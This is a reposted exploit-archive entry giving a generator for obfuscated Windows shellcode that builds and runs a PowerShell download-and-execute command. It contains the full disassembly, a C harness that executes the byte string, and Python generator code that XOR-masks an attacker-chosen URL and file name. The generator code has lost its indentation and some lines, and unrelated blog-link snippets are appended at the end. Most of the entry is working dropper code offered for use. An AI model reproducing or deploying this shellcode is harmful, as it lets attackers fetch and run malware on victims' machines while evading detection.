<转载>Win x86-64 - Download & execute (Generator)
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator
#length: Dynamic ! depend on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec => 0x77b1e695
#ExitProcess => 0x77ae2acf
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"
#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
#How it work ?
C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter filename
Example: D:\file.exe
C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 41 41 65 22 push $0x22654141
8: 58 pop %eax
9: c1 e8 08 shr $0x8,%eax
c: c1 e8 08 shr $0x8,%eax
f: 50 push %eax
10: b8 34 47 0b 4d mov $0x4d0b4734,%eax
15: bb 5d 69 6e 35 mov $0x356e695d,%ebx
1a: 31 d8 xor %ebx,%eax
1c: 50 push %eax
1d: b8 43 32 10 22 mov $0x22103243,%eax
22: bb 79 6e 51 4e mov $0x4e516e79,%ebx
27: 31 d8 xor %ebx,%eax
29: 50 push %eax
2a: b8 60 05 42 32 mov $0x32420560,%eax
2f: bb 49 78 79 71 mov $0x71797849,%ebx
34: 31 d8 xor %ebx,%eax
36: 50 push %eax
37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax
3c: bb 6a 64 49 33 mov $0x3349646a,%ebx
41: 31 d8 xor %ebx,%eax
43: 50 push %eax
44: b8 07 3e 0b 40 mov $0x400b3e07,%eax
49: bb 46 52 62 6e mov $0x6e625246,%ebx
4e: 31 d8 xor %ebx,%eax
50: 50 push %eax
51: b8 44 0a 78 07 mov $0x7780a44,%eax
56: bb 63 49 42 5b mov $0x5b424963,%ebx
5b: 31 d8 xor %ebx,%eax
5d: 50 push %eax
5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax
63: bb 6a 31 67 2d mov $0x2d67316a,%ebx
68: 31 d8 xor %ebx,%eax
6a: 50 push %eax
6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax
70: bb 61 4c 39 67 mov $0x67394c61,%ebx
75: 31 d8 xor %ebx,%eax
77: 50 push %eax
78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax
7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx
82: 31 d8 xor %ebx,%eax
84: 50 push %eax
85: b8 45 40 41 66 mov $0x66414045,%eax
8a: bb 3d 78 77 49 mov $0x4977783d,%ebx
8f: 31 d8 xor %ebx,%eax
91: 50 push %eax
92: b8 02 1f 4b 45 mov $0x454b1f02,%eax
97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx
9c: 31 d8 xor %ebx,%eax
9e: 50 push %eax
9f: b8 24 3e 19 32 mov $0x32193e24,%eax
a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx
a9: 31 d8 xor %ebx,%eax
ab: 50 push %eax
ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax
b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx
b6: 31 d8 xor %ebx,%eax
b8: 50 push %eax
b9: b8 1f 37 40 24 mov $0x2440371f,%eax
be: bb 6d 52 32 41 mov $0x4132526d,%ebx
c3: 31 d8 xor %ebx,%eax
c5: 50 push %eax
c6: b8 2e 35 68 31 mov $0x3168352e,%eax
cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx
d0: 31 d8 xor %ebx,%eax
d2: 50 push %eax
d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax
d8: bb 67 6e 69 61 mov $0x61696e67,%ebx
dd: 31 d8 xor %ebx,%eax
df: 50 push %eax
e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax
e5: bb 4f 45 62 33 mov $0x3362454f,%ebx
ea: 31 d8 xor %ebx,%eax
ec: 50 push %eax
ed: b8 20 57 1d 45 mov $0x451d5720,%eax
f2: bb 47 78 63 36 mov $0x36637847,%ebx
f7: 31 d8 xor %ebx,%eax
f9: 50 push %eax
fa: b8 04 6a 24 3b mov $0x3b246a04,%eax
ff: bb 77 44 4b 49 mov $0x494b4477,%ebx
104: 31 d8 xor %ebx,%eax
106: 50 push %eax
107: b8 18 0f 0a 32 mov $0x320a0f18,%eax
10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx
111: 31 d8 xor %ebx,%eax
113: 50 push %eax
114: b8 7d 18 3c 27 mov $0x273c187d,%eax
119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx
11e: 31 d8 xor %ebx,%eax
120: 50 push %eax
121: b8 03 44 60 60 mov $0x60604403,%eax
126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx
12b: 31 d8 xor %ebx,%eax
12d: 50 push %eax
12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax
133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx
138: 31 d8 xor %ebx,%eax
13a: 50 push %eax
13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax
140: bb 6c 37 47 45 mov $0x4547376c,%ebx
145: 31 d8 xor %ebx,%eax
147: 50 push %eax
148: b8 59 07 12 0e mov $0xe120759,%eax
14d: bb 35 68 73 6a mov $0x6a736835,%ebx
152: 31 d8 xor %ebx,%eax
154: 50 push %eax
155: b8 01 59 11 2c mov $0x2c115901,%eax
15a: bb 45 36 66 42 mov $0x42663645,%ebx
15f: 31 d8 xor %ebx,%eax
161: 50 push %eax
162: b8 22 22 4e 5a mov $0x5a4e2222,%eax
167: bb 4c 56 67 74 mov $0x7467564c,%ebx
16c: 31 d8 xor %ebx,%eax
16e: 50 push %eax
16f: b8 00 37 1b 48 mov $0x481b3700,%eax
174: bb 43 5b 72 2d mov $0x2d725b43,%ebx
179: 31 d8 xor %ebx,%eax
17b: 50 push %eax
17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax
181: bb 64 48 47 71 mov $0x71474864,%ebx
186: 31 d8 xor %ebx,%eax
188: 50 push %eax
189: b8 6a 23 03 18 mov $0x1803236a,%eax
18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx
193: 31 d8 xor %ebx,%eax
195: 50 push %eax
196: b8 2d 54 57 1c mov $0x1c57542d,%eax
19b: bb 47 31 34 68 mov $0x68343147,%ebx
1a0: 31 d8 xor %ebx,%eax
1a2: 50 push %eax
1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax
1a8: bb 39 38 79 38 mov $0x38793839,%ebx
1ad: 31 d8 xor %ebx,%eax
1af: 50 push %eax
1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax
1b5: bb 79 57 51 61 mov $0x61515779,%ebx
1ba: 31 d8 xor %ebx,%eax
1bc: 50 push %eax
1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax
1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx
1c7: 31 d8 xor %ebx,%eax
1c9: 50 push %eax
1ca: b8 2c 18 08 54 mov $0x5408182c,%eax
1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx
1d4: 31 d8 xor %ebx,%eax
1d6: 50 push %eax
1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax
1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx
1e1: 31 d8 xor %ebx,%eax
1e3: 50 push %eax
1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax
1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx
1ee: 31 d8 xor %ebx,%eax
1f0: 50 push %eax
1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax
1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx
1fb: 31 d8 xor %ebx,%eax
1fd: 50 push %eax
1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax
203: bb 39 44 61 4f mov $0x4f614439,%ebx
208: 31 d8 xor %ebx,%eax
20a: 50 push %eax
20b: 89 e0 mov %esp,%eax
20d: bb 41 41 41 01 mov $0x1414141,%ebx
212: c1 eb 08 shr $0x8,%ebx
215: c1 eb 08 shr $0x8,%ebx
218: c1 eb 08 shr $0x8,%ebx
21b: 53 push %ebx
21c: 50 push %eax
21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx
222: ff d3 call *%ebx
224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx
229: ff d3 call *%ebx
#you have your shellcode now
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe
Length: 173
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second
import random,binascii
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
p1 = '''xor eax,eax
push eax
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
m = 0
for word in sen:
m += 1
m = m - 1
stack = ''
stack += sen[m]
m -= 1
stack = stack.encode('hex')
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8
c = 0
n = 0
z = 8
shf = open('shellcode.asm','w')
shf = open('shellcode.asm','a')
v = 'push 0x' + stack[n:z]
skip = 0
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'
if skip is 1:
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
n += 8
z += 8
c += 1
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近期在公司涉及到了服务器等的扩展,smartfoxserver扩展使用的Eclipse,尽管没学过java.可是咱毕竟是C++起价的,其它语言看看也就会了,项目依然做着,近期看到某同学有一些java的 ...
- 使用Kotlin开发Android应用 - 环境搭建 (1)
一. 在Android Studio上安装Kotlin插件 按快捷键Command+, -> 在Preferences界面找到Plugins -> 点击Browse repositorie ...
- springboot springmvc 支持 https
Spring Mvc和Spring Boot配置Tomcat支持Https 背景 最近在项目开发中需要让自己的后端Restful接口支持https,在参考了很多前辈们的博客后总结了一些. Spring ...
- 面试题2:实现Singleton模式(Java实现)
SIngleton(单例)设计模式 它是最简单的常用的设计模式之一,设计模式在面向对象程序设计中起着举足轻重的作用,Singleton是唯一一个能够用短短几十行代码完整实现的模式. public cl ...